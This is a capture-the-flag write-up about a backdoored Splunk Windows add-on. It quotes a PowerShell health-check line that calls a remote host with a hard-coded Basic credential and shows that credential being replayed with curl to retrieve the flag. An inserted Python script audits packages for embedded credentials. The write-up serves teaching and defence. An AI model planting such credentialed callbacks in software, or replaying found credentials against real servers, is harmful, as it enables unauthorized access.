Huntress CTF > Medium Challenges

You’ve probably seen Splunk being used for good, but have you seen it used for evil?

We were given a ‘Splunk_TA_windows.zip’ file to download. Once the contents were extracted, we had several directories and files to inspect.

Furthermore, curling the provided URL gives the following response:

curl http://chal.ctf.games:30644/
{"error":"Missing or invalid Authorization header"}

It seems the request is missing an Authorization header. We can check whether one is present anywhere in the extracted files using:

grep -ri Authorization 

We get a promising hit in the results:

bin/powershell/nt6-health.ps1:$OS = @($html = (Invoke-WebRequest http://chal.ctf.games:$PORT -Headers @{Authorization=("Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==")} -UseBasicParsing).Content
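The grep above finds the header by eye; the same check can be automated so that an add-on package is audited for embedded HTTP credentials before it is deployed. The script below is an added example, not part of the original writeup or of the Splunk add-on: it scans text (or a whole extracted directory) for `Authorization ... Basic <token>` patterns, base64-decodes each token into a username/password pair, notes the URL on the same line, and reports the password masked. The regexes, the file-extension list and the `Finding` record are my own choices; the sample input is the `nt6-health.ps1` line quoted above plus a constructed benign line. One detail the decoder surfaces: the token ends in `Cg==`, so the decoded password carries a trailing newline, which is what you get when a secret is piped through `base64` from `echo` without `-n`.

```python
"""Audit a script bundle (e.g. an extracted Splunk add-on) for hard-coded Basic credentials."""
import base64
import binascii
import os
import re
from dataclasses import dataclass, field

# Matches Authorization=("Basic xxx"), Authorization: Basic xxx, 'Authorization' => 'Basic xxx', ...
BASIC_AUTH_RE = re.compile(r"""Authorization[\s"'=:>(\[,]*Basic\s+([A-Za-z0-9+/=]+)""", re.IGNORECASE)
# Any http(s) URL on the same line tells us where the credential would be sent.
URL_RE = re.compile(r"""https?://[^\s"')]+""")


@dataclass
class Finding:
    path: str
    line_no: int
    username: str
    secret: str
    urls: list = field(default_factory=list)


def decode_basic(token):
    """Decode a Basic credential token into (username, password).

    Returns None when the token is not valid base64 or lacks the ':' separator,
    so callers can skip false positives instead of crashing on them.
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if b":" not in raw:
        return None
    user, _, secret = raw.partition(b":")
    return user.decode("utf-8", "replace"), secret.decode("utf-8", "replace")


def scan_text(text, path="<memory>"):
    """Return a Finding for every decodable Basic credential in the given text."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for match in BASIC_AUTH_RE.finditer(line):
            cred = decode_basic(match.group(1))
            if cred is None:
                continue
            findings.append(Finding(path, line_no, cred[0], cred[1], URL_RE.findall(line)))
    return findings


def scan_tree(root, exts=(".ps1", ".py", ".sh", ".js", ".bat", ".cmd", ".conf")):
    """Walk an extracted package and scan every script/config file in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(fh.read(), full))
    return findings


def mask(secret):
    """Show only a hint of the password so the report itself does not leak it."""
    s = secret.rstrip("\r\n")
    return f"{s[:3]}...({len(s)} chars{', trailing newline' if s != secret else ''})"


# Constructed sample: the line the writeup found, plus a benign line that must not match.
SAMPLE = r'''$OS = @($html = (Invoke-WebRequest http://chal.ctf.games:$PORT -Headers @{Authorization=("Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==")} -UseBasicParsing).Content
$Disk = Get-WmiObject -Class Win32_LogicalDisk -Filter "DriveType=3"
'''

if __name__ == "__main__":
    for f in scan_text(SAMPLE, "bin/powershell/nt6-health.ps1"):
        print(f"{f.path}:{f.line_no}: user={f.username!r} secret={mask(f.secret)} urls={f.urls}")
```

Run it against the unzipped add-on with `scan_tree("Splunk_TA_windows")` to list every file that ships a credential; a health-check script that calls out to an arbitrary host with a baked-in login is exactly the kind of hit that should block deployment.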

We then tried curling the URL again, this time including the Authorization header like so:

curl http://chal.ctf.games:30644/ -H Authorization:"Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg=="

This time we received a response containing a base64-encoded message. Decoding it gave us the flag, which we submitted.